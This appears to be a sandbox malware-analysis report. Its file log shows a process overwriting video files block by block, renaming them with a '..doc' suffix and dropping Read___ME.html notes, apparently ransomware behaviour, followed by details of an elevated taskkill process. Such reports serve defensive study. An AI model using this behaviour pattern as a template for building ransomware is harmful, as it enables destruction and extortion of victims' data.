File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\9JZc.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, type = size, size_out = 13609	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\fWOL9DBWif.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, type = size, size_out = 79592	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\O8eEM2rfs_MY3eq9rG.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, type = size, size_out = 9896	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\s0d9d09EsgnYM8FvdWh.avi..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\XBh9XWX0LPZGgDjBITI\cxqVyRkp8K1US\j-xye\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, type = size, size_out = 83820	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 8192, size_out = 1900	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 1904	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\dINDjPM.mp4..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, type = size, size_out = 81163	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\GppAg7bkp9yD0gqXY.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, type = size, size_out = 74231	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\gX_wpIDL1D.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, type = size, size_out = 18593	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 8192, size_out = 2209	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 2224	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\WnVoa3g9JP.avi..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\nXLOUPBUSENPl3p-\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, type = size, size_out = 65888	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 8192, size_out = 352	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 352	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 32	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 16	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 128	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, size = 768	1	Fn Data
File	Move	source_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv, destination_filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\29fvAWN e8KITEzwwn.flv..doc, flags = MOVEFILE_REPLACE_EXISTING	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\Read___ME.html, type = file_attributes	1	Fn
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\Read___ME.html, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\Read___ME.html, size = 4282	1	Fn Data
File	Create	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\a6mtdOtp8JU.avi, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
File	Get Info	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\a6mtdOtp8JU.avi, type = size, size_out = 62311	1	Fn
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\a6mtdOtp8JU.avi, size = 8192, size_out = 8192	1	Fn Data
File	Write	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\a6mtdOtp8JU.avi, size = 8192	1	Fn Data
File	Read	filename = C:\Users\CIiHmnxMn6Ps\Videos\bGVBhkL2p_r\8kLT4Ds_WbYAiWWTJ\a6mtdOtp8JU.avi, size = 8192, size_out = 8192	1	Fn Data
For performance reasons, the remaining 10572 entries are omitted. The remaining entries can be found in glog.xml.

Process #7: taskkill.exe

Information	Value
ID	#7
File Name	c:\windows\syswow64\taskkill.exe
Command Line	taskkill /F /T /PID 2784
Initial Working Directory	C:\Users\CIIHMN~1\AppData\Local\Temp\
Monitor	Start Time: 00:00:37, Reason: Child Process
Unmonitor	End Time: 00:05:23, Reason: Terminated by Timeout
Monitor Duration	00:04:46
Remarks	No high level activity detected in monitored regions

OS Process Information

Information	Value
PID	0xff4
Parent PID	0xfe0 (c:\users\ciihmn~1\appdata\local\temp\vworbzlbc.exe)
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	LHNIWSJ\CIiHmnxMn6Ps
Groups	LHNIWSJ\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account and member of Administrators group (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Local account (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:00013d92 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x FF8 0x C18 0x C38 0x CE0 0x D08 0x D18

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000b20000	0x00b20000	0x00b3ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000b20000	0x00b20000	0x00b2ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000b30000	0x00b30000	0x00b33fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000b40000	0x00b40000	0x00b41fff	Private Memory	Readable, Writable	Region Actions Download Dump
taskkill.exe.mui	0x00b40000	0x00b44fff	Memory Mapped File	Readable	Region Actions
pagefile_0x0000000000b50000	0x00b50000	0x00b63fff	Pagefile Backed Memory	Readable	Region Actions
private_0x0000000000b70000	0x00b70000	0x00baffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000bb0000	0x00bb0000	0x00beffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000bf0000	0x00bf0000	0x00bf3fff	Pagefile Backed Memory	Readable	Region Actions
